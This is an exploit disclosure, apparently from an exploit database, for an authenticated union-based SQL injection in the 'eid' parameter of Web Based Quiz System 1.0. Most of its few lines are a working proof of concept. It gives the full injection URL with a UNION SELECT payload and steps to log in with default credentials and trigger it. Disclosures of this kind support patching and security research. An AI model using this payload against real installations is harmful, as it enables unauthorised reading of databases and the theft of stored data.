# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) # Date: 04-03-2021 # Exploit Author: Deepak Kumar Bharti # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Tested on: Windows 10 Pro # Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in Welcome page in quiz section eid parameter affected from this vulnerability. # URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34 POC: # go to url http://localhost/login.php # then you have to login with default creds # then go to quiz and execute the payload ie:-- http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34